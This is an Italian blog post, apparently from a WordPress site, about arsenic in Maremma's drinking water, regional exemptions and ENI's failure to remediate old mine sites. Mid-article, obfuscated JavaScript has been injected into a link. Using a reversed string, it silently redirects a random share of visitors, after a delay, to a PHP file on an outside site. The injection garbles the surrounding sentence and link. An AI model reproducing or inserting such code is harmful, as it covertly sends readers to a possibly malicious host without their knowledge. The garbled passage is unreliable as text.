Maremma amara. C'è arsenico nell'acqua, ma l'Eni non bonifica, e la Regione deroga

image_pdfimage_print

Nel cuore della Maremma toscana, si beve acqua definita potabile con un contenuto di arsenico fino a 5 volte superiore ai limiti di legge. Questo grazie alle deroghe stabilite dalla Regione Toscana, che insieme alle istituzioni locali non obbliga ENI a rispettare le leggi sulla bonifica dei siti minerari, segnalati come inquinati da oltre 20 anni.
E’ la denuncia lanciata tramite un video documentario pubblicato su Youtube, che rilanciamo qui sotto.
Nel video ci spiega la situazione Roberto Barocci, ambientalista, che da anni denuncia instancabile il disastro dell’area. Qui le portate medie di acque avvelenate sono di 450 litri al secondo. Vengono scaricate dai canali drenanti le ex miniere nel reticolo idrico superficiale nella Maremma grossetana, negando il futuro ad un intero territorio. Purtroppo, come ricorda Barocci con amarezza, il Parlamento ha $p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}androronchi.net/2010/inquinamento-del-lambro-e-del-po-il-centrodestra-ha-depenalizzato-il-reato/” mce_href=”http://alessandroronchi.net/2010/inquinamento-del-lambro-e-del-po-il-centrodestra-ha-depenalizzato-il-reato/”>depenalizzato i reati ambientali “meno gravi”, che quindi vanno rapidamente in prescrizione… Acqua passata, come già titolava Report in un’inchiesta sullo stesso tema.

0 Comments

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *